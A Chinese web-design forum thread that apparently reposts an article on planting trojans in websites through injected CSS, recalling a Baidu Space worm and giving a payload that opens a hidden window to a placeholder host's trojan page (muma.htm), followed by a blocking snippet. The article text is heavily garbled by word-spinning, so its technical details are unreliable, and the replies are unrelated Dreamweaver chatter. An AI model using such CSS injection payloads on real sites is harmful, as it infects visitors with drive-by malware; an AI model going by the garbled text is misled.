仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 581|回复: 8
打印 上一主题 下一主题

[DIV+CSS] 来一发黑客挑选CSS代码挂马 CSS挂马攻防实录

[复制链接]
透明 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-15 23:21:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
不管你用什么工具软件制作网页,都有在有意无意地使用CSS。用好CSS能使你的网页更加简炼,同样内容的网页,有的人做出来有几十KB,而高手做出来只有十几KB。
网页制造poluoluo文章简介:跟着Web2.0的提高,各类网页殊效用得愈来愈多,这也给黑客一个无隙可乘。他们发明,用来制造网页殊效的CSS代码,也能够用来挂马。而对照取笑的是,CSS挂马体例实际上是从提防E挂马的CSS代码演化而来。
黑客们发明发明,用来制造网页殊效的CSS代码,也能够用来挂马。
跟着Web2.0的提高,各类网页殊效用得愈来愈多,这也给黑客一个无隙可乘。他们发明,用来制造网页殊效的CSS代码,也能够用来挂马。而对照取笑的是,CSS挂马体例实际上是从提防E挂马的CSS代码演化而来。
网站挂马的手腕最后十分单一,可是跟着Web2.0手艺和Blog、Wiki等普遍的使用,挂马也出现出林林总总的手艺,个中CSS挂马体例,能够说是Web2.0时期黑客的最爱。有很多十分出名的网站都被黑客用CSS挂马进侵过。
在我印象中,影象最深入的一次是百度空间CSS挂马。事先,百度空间推出没有多久,就有很多百度用户收到了相似“哈,节日康乐呀!强烈热闹庆贺2008,心境好好,记着要想我!http://hi.baidu.com/XXXXX”的站内动静。
因为网址是百度空间的网址,很多用户以为不会存在平安成绩,加上又有多是本人伴侣发来的,因而会坚决果断地址击进进。可是进进指定的网址后,用户就会传染蠕虫病毒,并持续传布。
因为蠕虫分散十分严峻,终极招致百度空间不能不公布官方声明提示用户,而且年夜费周折地在服务器中扫除蠕虫的歹意代码。那一次的挂马事务使用的就是百度空间CSS模板功效,经由过程变形的expression在CSS代码中静态实行剧本,让指定的远程歹意代码文件在背景悄然运转并发送大批假造信息。
我倡议人人在点击生疏链接时,要多个心眼,年夜网站也是大概被挂马的。人人在上彀时,最好仍是利用一些带网页木马拦阻功效的平安帮助工具。
黑客为何选择CSS挂马?
在Web1.0时期,利用E挂马关于黑客而言,与其说是为了更好地完成木马的埋没,倒不如说是迫不得已的一个选择。在复杂的HTML网页和缺少交互性的网站中,黑客能够使用的手腕也十分无限,即便接纳了庞大的假装,也很简单被看破,还不如E来得间接和无效。
但现在交互式的Web2.0网站愈来愈多,同意用户设置与修正的博客、SNS社区等纷繁呈现。这些互动性十分强的社区和博客中,常常会供应丰厚的功效,而且会同意用户利用CSS层叠款式表来对网站的网页举行自在的修正,这促使了CSS挂马盛行。
小百科:
CSS是层叠款式表(CascadingStyleSheets)的英文缩写。CSS最次要的目标是将文件的布局(用HTML或其他相干言语写的)与文件的显现分开开来。这个分开可让文件的可读性失掉增强、文件的布局加倍天真。
黑客在使用CSS挂马时,常常是借着网平易近对某些年夜网站的信托,将CSS歹意代码挂到博客大概其他撑持CSS的网页中,当网平易近在会见该网页时歹意代码就会实行。这就好像你往一家出名且证照完全的年夜病院看病,你十分信托病院,可是你所看的门诊却已被庸医外包了上去,而且打着病院的名义使用你的信托乐成棍骗了你。可是当你过后往找人算账时,病院此时也常常一脸无辜。关于平安工程师而言,CSS挂马的排查是必备知识。

网页制造poluoluo文章简介:跟着Web2.0的提高,各类网页殊效用得愈来愈多,这也给黑客一个无隙可乘。他们发明,用来制造网页殊效的CSS代码,也能够用来挂马。而对照取笑的是,CSS挂马体例实际上是从提防E挂马的CSS代码演化而来。

CSS挂马攻防实录
攻CSS挂马体例较多,但支流的体例是经由过程有毛病的博客大概SNS交际网站体系,将歹意的CSS代码写进撑持CSS功效的本性化页面中。上面我们以典范的CSS挂马体例为例举行解说。
体例1:
Body
“background-image”在CSS中的次要功效是用来界说页面的背景图片。这是最典范的CSS挂马体例,这段歹意代码次要是经由过程“background-image”共同t代码让网页木马悄然地在用户的电脑中运转。
那怎样将这段CSS歹意代码挂到一般的网页中往呢?黑客能够将天生好的网页木马放到本人指定的地位,然后将该段歹意代码写进挂马网站的网页中,大概挂马网页所挪用的CSS文件中。
小百科:
利用Body工具元素,次要是为了让工具不再改动全部网页文档的内容,经由过程Body工具的把持,能够将内容大概效果把持在指定的巨细内,好像利用DIV工具那样准确地设置巨细。
体例2:
Body
background-image:url(t:open(”http://www.X.com/muma.htm”,”newwindow”,”border=”1″Height=0,Width=0,top=1000,center=0,toolbar=no,menubar=no,scrollbars=no,resizable=no,location=no,status=no”))
体例1的CSS挂马手艺,在运转时会呈现空缺的页面,影响网页会见者一般的会见,因而对照简单发明。不外在体例2中的这段代码,利用了t的Open开窗,经由过程新开一个埋没的窗口,在背景悄然地运转新窗口并激活会见网页溢出木马页面,不会影响会见者寓目网页内容,因而加倍潜伏。
防收集服务器被挂马,一般会呈现防病毒软件告警之类的信息。因为毛病不休更新,挂马品种时候都在变更,经由过程客户真个反应来发明服务器是不是被挂马常常疏漏较年夜。准确的做法是常常反省服务器日记,发明非常信息,常常反省网站代码,利用网页木马检测体系,举行排查。
今朝除利用之前的阻断弹出窗口提防CSS挂马以外,还能够在网页中设置CSS过滤,将CSS过滤失落。不外假如你选择过滤CSS的话,起首必要寄望本人的相干网页是不是有CSS的内容,因而我们仍旧首推用阻断体例来提防CSS.阻断代码以下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=”“);
将外域的木马代码的src重写本钱地IE404毛病页面的地点,如许,外域的t代码不会被下载。不外阻断体例也有生成致命的缺点,缺点的奥密我们将于下次发表。
</p>
大大缩减页面代码,提高页面浏览速度,缩减带宽成本;
简单生活 该用户已被删除
沙发
发表于 2015-1-17 22:11:33 | 只看该作者
HTML技术的不断发展和完善,随之而产生了众多网页编辑器,从网页编辑器基本性质可以分为所见即所得网页编辑器和非所见即所得网页编辑器(则原始代码编辑器)
变相怪杰 该用户已被删除
板凳
发表于 2015-1-23 20:17:28 | 只看该作者
我深感到交流的重要。善于交流的人才是善于学习的人。在整个技术的学习过程中,我总结了四大定律:兴趣、恒心、虚心、时间。
第二个灵魂 该用户已被删除
地板
发表于 2015-1-31 20:34:13 | 只看该作者
Dreamweaver是集网页制作和管理网站于一身的所见即所得网页编辑器,在编辑时能同时看到源码和设计界面,非常方便新手学习制作网页。
山那边是海 该用户已被删除
5#
发表于 2015-2-7 01:33:33 | 只看该作者
您在所见即所得网页编辑器进行网页制作和在WORD中进行文本编辑不会感到有什么区别,但它同时也存在着致命的弱点。
冷月葬花魂 该用户已被删除
6#
发表于 2015-2-19 17:47:39 | 只看该作者
在刚开始接触网页的第一堂课上,听说网页制作会是一门很无聊并且很难听懂的过程,而事实却印证了这样一个事实。
老尸 该用户已被删除
7#
发表于 2015-3-6 15:43:06 | 只看该作者
Dreamweaver在所见即所得添加链接,也可以先选中文字或图片然后在属性栏中的链接栏后的一个小圆圈,用鼠标点击小圆圈按住不放拖动出箭头然后指向文件即可。
莫相离 该用户已被删除
8#
发表于 2015-3-13 04:14:07 | 只看该作者
是当我和赵丽芬崔明艳老师进行交流后,很快就了解了还不太清楚的内容和并不了解的知识(像布局表格、绘制布局单元格等)。
若相依 该用户已被删除
9#
发表于 2015-3-20 12:46:06 | 只看该作者
只要我们努力,无论是怎样的艰难险阻,成功依然会迎面直击。在刚开始时我觉得dreamweaver mx XX很难理解。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 02:39

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表